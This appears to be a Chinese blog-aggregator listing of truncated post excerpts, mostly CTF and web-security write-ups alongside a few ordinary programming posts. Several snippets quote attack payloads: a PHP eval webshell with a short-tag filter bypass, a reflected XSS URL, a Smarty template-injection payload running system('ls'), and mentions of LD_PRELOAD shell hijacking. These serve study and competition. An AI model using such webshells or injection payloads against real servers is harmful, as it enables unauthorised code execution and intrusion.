和[BUUCTF 2018]Online Tool类似,直接用里面的payload ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_POST["hack"]);?> -o ...
分类:
其他好文 时间:
2020-05-29 19:49:08
阅读次数:
352
# payload 请求方式 yield scrapy.Request(url=url, method='POST', dont_filter=True, meta={ 'xx': 'dd' }, headers=headers, body=json.dumps(ex_data), callback ...
分类:
其他好文 时间:
2020-05-28 21:58:46
阅读次数:
118
第一关: 没有过滤,直接构造payload过关: http://127.0.0.1/xssgame/level1.php?name=test%3Cscript%3Ealert%28111%29%3C/script%3E 第二关: 输入之后观察页面源代码可以看到被转义 Payload:?keyword... ...
分类:
其他好文 时间:
2020-05-25 22:32:39
阅读次数:
125
原文:ASP.Net Core 3.1 中使用JWT认证 JWT认证简单介绍 关于Jwt的介绍网上很多,此处不在赘述,我们主要看看jwt的结构。 JWT主要由三部分组成,如下: HEADER.PAYLOAD.SIGNATURE HEADER包含token的元数据,主要是加密算法,和签名的类型,如下面... ...
分类:
Web程序 时间:
2020-05-24 00:44:03
阅读次数:
80
文件位置 /usr/share/metasploit-framework/modules/ 技术功能模块介绍 exploits 利用系统漏洞进行攻击的操作,此模块对应每一个具体漏洞的攻击方法 payload 成功exploit之后,真正在目标系统执行的代码攻击 evasion 专门针对windows ...
分类:
Web程序 时间:
2020-05-23 16:50:33
阅读次数:
120
dom base_xss [toc] DOM XSS in sink using source 题目描述 搜索功能点调用了 函数,借此函数调用 解题步骤 看着语句写payload 包围 构造payload: DOM XSS in sink using source 题目描述 这道题的搜索功能点会使用 ...
分类:
Web程序 时间:
2020-05-23 14:57:01
阅读次数:
75
知识点: preg_replace()使用的/e模式可以存在远程执行代码 解析见链接:https://xz.aliyun.com/t/2557 看题目 首先是一段源代码: text是PHP的DATA伪协议 file是PHP的filter伪协议 payload: 得到第二段源代码: payload如下 ...
分类:
其他好文 时间:
2020-05-23 13:12:07
阅读次数:
46
1、网络请求 1 Dio _dio = new Dio(); 2 3 Future getInformationJson(User user) async { 4 5 var url = 'http://xxx/xxx/xxx?username=' + user._username + 6 '&pa ...
分类:
其他好文 时间:
2020-05-20 23:56:13
阅读次数:
101
关于环境变量$ LD_PRELOAD $LD_PRELOAD是一个环境变量,用于加载动态库,他的优先级是最高的 一个挑战就是,这玩意可以产生一个shell,就像下面这样: 劫持库函数 假设存在一段这样的代码,其编译过程 好的我们来覆写一下这个函数 构造Payload 参考文献 "Hijacking ...
分类:
系统相关 时间:
2020-05-18 16:01:44
阅读次数:
115
知识点 SSTI smarty 抓包,根据题目猜想X-Forwarded-For处可能有问题,测试了一下,存在模板注入 测试了一下,是smarty注入smarty注入payload {if phpinfo()}{/if} {if system('ls')}{/if} { readfile('/fla ...
分类:
其他好文 时间:
2020-05-15 00:42:59
阅读次数:
145